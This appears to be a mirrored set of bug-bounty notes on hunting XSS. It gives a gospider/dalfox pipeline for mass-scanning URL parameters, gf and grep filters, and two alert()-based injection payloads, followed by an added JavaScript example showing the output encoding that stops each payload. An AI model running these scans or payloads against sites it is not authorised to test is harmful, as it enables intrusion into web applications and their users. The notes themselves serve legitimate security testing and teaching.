mirror of
https://github.com/xalgord/My-Methodologies.git
synced 2024-11-29 07:00:20 +00:00
❌ xss
Collect as many parameters as possible:
- https://github.com/devanshbatham/ParamSpider
- gospider -S targeturls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}' | grep "=" | qsreplace -a | dalfox pipe -o result.txt
- Waybackurls | gau
- https://github.com/s0md3v/Arjun
- https://github.com/hakluke/hakrawler
- https://github.com/PortSwigger/param-miner
Combine all in a file and remove duplicates.
Run an XSS fuzzer.
Resources:
- https://blog.yeswehack.com/yeswerhackers/parameter-discovery-quick-guide-to-start/
- https://infosecwriteups.com/tale-of-my-first-xss-27f622bc47c0
dalfox usage:
# write to a new file: redirecting back into domain.txt truncates it before gf reads it
gf xss domain.txt | grep -Eo 'https?://[^\"]+' > xss_urls.txt
dalfox file xss_urls.txt -w 20 --silence
Another technique to find XSS:
- Scrape all URLs from the domain using gau
- then filter the results with grep:
cat url.txt | grep "utm_"
- test the resulting URLs
resources:
Custom useful XSS Attack Vectors
testing"><img/src=x onerror=alert(/XSS/)//
testing'-alert(2)-'xss
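Why these two vectors work and which output encoding stops each, as an added example that is not part of the original notes: the first closes a double-quoted HTML attribute, the second closes a single-quoted JavaScript string. The templates `renderAttr` and `renderJsString` and the checks `staysInAttr` and `staysInJsString` are hypothetical names made up for this illustration.

```javascript
// Added example, not from the original notes. renderAttr and renderJsString
// are hypothetical templates standing in for a page that reflects a parameter.

// Encoder for HTML element content and quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Encoder for a quoted JavaScript string literal in an inline script block.
// Everything except letters, digits and spaces becomes \uXXXX, so the value
// can close neither the string literal nor the surrounding script element.
function escapeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Reflection into a double-quoted attribute (context of the first vector).
function renderAttr(value, encode) {
  return '<input name="q" value="' + (encode ? escapeHtml(value) : value) + '">';
}

// Reflection into a single-quoted JS string (context of the second vector).
function renderJsString(value, encode) {
  return "<script>var q = '" + (encode ? escapeJsString(value) : value) + "';</script>";
}

// The two vectors listed above, used as test input.
const attrVector = 'testing"><img/src=x onerror=alert(/XSS/)//';
const jsVector = "testing'-alert(2)-'xss";

// True when the reflected value stays inside its quotes, i.e. the markup
// around it is exactly what the template author wrote.
function staysInAttr(html) {
  return /^<input name="q" value="[^"<>]*">$/.test(html);
}
function staysInJsString(html) {
  return /^<script>var q = '[^'<]*';<\/script>$/.test(html);
}

console.log(staysInAttr(renderAttr(attrVector, false)));        // unencoded
console.log(staysInAttr(renderAttr(attrVector, true)));         // encoded
console.log(staysInJsString(renderJsString(jsVector, false)));  // unencoded
console.log(staysInJsString(renderJsString(jsVector, true)));   // encoded
```

The encoder has to match the context the value lands in: HTML entity encoding alone does not protect a value inside an inline event-handler attribute, because the browser decodes the entities before the script runs.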
Encoding Bypass: